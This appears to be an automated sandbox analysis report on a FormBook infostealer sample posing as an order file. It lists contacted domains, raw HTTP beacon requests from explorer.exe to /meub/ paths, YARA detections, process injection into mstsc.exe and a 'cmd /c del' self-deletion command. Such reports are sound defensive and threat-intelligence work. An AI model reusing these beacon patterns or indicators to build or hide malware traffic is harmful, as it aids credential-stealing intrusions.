                                                                      • www.tjanyancha.com
                                                                      • www.dmowang.com
                                                                      • www.pocopage.com
                                                                      • www.goodcreditcardshome.info
                                                                      • www.pasteleriaruth.com
                                                                      • www.amesshop.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.44972134.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:51:18.705996990 CEST221OUTGET /meub/?6lt4=M6ATVT20FLj&ktI=QUeAVjOekbDfJHkoX1fEShfTueYawgYx/upvqY2KU2Y9ees5c1/xq3BWwCfJvPCdwXre HTTP/1.1
                                                                      Host: www.comicstattoosnguns.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 10:51:18.844482899 CEST222INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Wed, 12 May 2021 08:51:18 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "609953da-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.44972266.96.162.13080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:51:24.162463903 CEST222OUTGET /meub/?ktI=F4zWwb5Q9DmjBwYPj4pXutYCzYEQVONbMin29ERkoE+ZXMdA8ttbKylRMOj5c1Wk3PTt&6lt4=M6ATVT20FLj HTTP/1.1
                                                                      Host: www.goeseo.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 10:51:24.313256979 CEST223INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 12 May 2021 08:51:24 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 867
                                                                      Connection: close
                                                                      Server: Apache/2
                                                                      Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                      Accept-Ranges: bytes
                                                                      Accept-Ranges: bytes
                                                                      Age: 0
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.44972334.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:51:29.427136898 CEST224OUTGET /meub/?6lt4=M6ATVT20FLj&ktI=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSgcH90A9/Nib HTTP/1.1
                                                                      Host: www.shadyshainarae.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 10:51:29.565346956 CEST225INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Wed, 12 May 2021 08:51:29 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60995c49-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.44972434.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:51:34.680213928 CEST226OUTGET /meub/?ktI=xRifbL4BvWher3OHgQRKthYl2aDcqb2ql1CEYfUIGij2TzekdjVq3iFcomd6Mb6Rt5kB&6lt4=M6ATVT20FLj HTTP/1.1
                                                                      Host: www.thefrankversion.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 10:51:34.817344904 CEST226INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Wed, 12 May 2021 08:51:34 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60995c49-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.449725107.164.93.17280C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:51:41.394385099 CEST227OUTGET /meub/?6lt4=M6ATVT20FLj&ktI=HA9QI0xR/eIEayTgXNJLcHJwamOlS6+rzTzzM4lOubNr4vQrzt8Snda4qRdcgxMYmUWA HTTP/1.1
                                                                      Host: www.tjanyancha.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.449726104.164.26.24680C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:51:47.347271919 CEST228OUTGET /meub/?ktI=VqHNClkDyt9S09rmrtZFTmOk0wmUkkyZtURD8RLTEyQOquxMghQjpEd/0gJKSXCP8Z6X&6lt4=M6ATVT20FLj HTTP/1.1
                                                                      Host: www.dmowang.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 10:51:47.953749895 CEST228INHTTP/1.1 301 Moved Permanently
                                                                      Location: /meub/index.jsp
                                                                      Server: Microsoft-IIS/7.5
                                                                      X-Powered-By: ASP.NET
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Headers: *
                                                                      Access-Control-Allow-Methods: GET, POST
                                                                      Date: Wed, 12 May 2021 08:51:49 GMT
                                                                      Connection: close
                                                                      Content-Length: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      6192.168.2.449727198.54.117.21680C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:51:58.312855959 CEST229OUTGET /meub/?ktI=9ZO5voGbPxiLxNlgiLAc+dZNiPLY07W/lgUO8wfbTKsVjaeGgcbK9o/DChjFDdb4OPcD&6lt4=M6ATVT20FLj HTTP/1.1
                                                                      Host: www.pocopage.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      7192.168.2.44972818.219.49.23880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:52:09.098130941 CEST233OUTGET /meub/?ktI=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045evUyzXtuHZk&6lt4=M6ATVT20FLj HTTP/1.1
                                                                      Host: www.goodcreditcardshome.info
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 10:52:09.267746925 CEST234INHTTP/1.1 302 Found
                                                                      content-length: 0
                                                                      location: https://www.goodcreditcardshome.info/meub/?ktI=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045evUyzXtuHZk&6lt4=M6ATVT20FLj
                                                                      cache-control: no-cache
                                                                      connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      8192.168.2.449729162.241.62.6380C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:52:14.662301064 CEST234OUTGET /meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox HTTP/1.1
                                                                      Host: www.pasteleriaruth.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 10:52:14.828128099 CEST235INHTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 12 May 2021 08:52:14 GMT
                                                                      Server: Apache
                                                                      Location: https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox
                                                                      Content-Length: 338
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 61 73 74 65 6c 65 72 69 61 72 75 74 68 2e 63 6f 6d 2f 6d 65 75 62 2f 3f 36 6c 74 34 3d 4d 36 41 54 56 54 32 30 46 4c 6a 26 61 6d 70 3b 6b 74 49 3d 42 72 5a 44 78 72 74 37 38 52 34 4f 53 50 36 58 38 33 52 4a 51 38 49 38 79 69 30 61 2f 51 4a 67 69 45 61 79 73 35 64 6f 37 53 49 54 53 41 50 70 53 46 31 68 42 55 2f 4a 57 32 31 58 4c 42 51 77 45 33 4f 78 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&amp;ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox">here</a>.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      9192.168.2.44973034.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:52:19.946628094 CEST236OUTGET /meub/?ktI=wuaJ69bwL+iBa6D7QaSRhbV0uekkoXOmRMeqk599uDu+rKjL/28r+d/9hZ/YryEoMLIX&6lt4=M6ATVT20FLj HTTP/1.1
                                                                      Host: www.amesshop.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 10:52:20.083381891 CEST237INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Wed, 12 May 2021 08:52:20 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "609953af-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Code Manipulations

                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      Analysis Process: Order 122001-220 guanzo.exe PID: 864 Parent PID: 5948

                                                                      General

                                                                      Start time:10:50:13
                                                                      Start date:12/05/2021
                                                                      Path:C:\Users\user\Desktop\Order 122001-220 guanzo.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'
                                                                      Imagebase:0x80000
                                                                      File size:736768 bytes
                                                                      MD5 hash:9E819BCC826E7A20B0FD139CC4185195
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: Order 122001-220 guanzo.exe PID: 5676 Parent PID: 864

                                                                      General

                                                                      Start time:10:50:16
                                                                      Start date:12/05/2021
                                                                      Path:C:\Users\user\Desktop\Order 122001-220 guanzo.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\Order 122001-220 guanzo.exe
                                                                      Imagebase:0xe60000
                                                                      File size:736768 bytes
                                                                      MD5 hash:9E819BCC826E7A20B0FD139CC4185195
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: explorer.exe PID: 3424 Parent PID: 5676

                                                                      General

                                                                      Start time:10:50:18
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff6fee60000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: mstsc.exe PID: 1556 Parent PID: 3424

                                                                      General

                                                                      Start time:10:50:31
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\mstsc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\mstsc.exe
                                                                      Imagebase:0x9d0000
                                                                      File size:3444224 bytes
                                                                      MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      Chronological Activities

                                                                      Analysis Process: cmd.exe PID: 4700 Parent PID: 1556

                                                                      General

                                                                      Start time:10:50:34
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'
                                                                      Imagebase:0x11d0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: conhost.exe PID: 808 Parent PID: 4700

                                                                      General

                                                                      Start time:10:50:35
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff724c50000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >

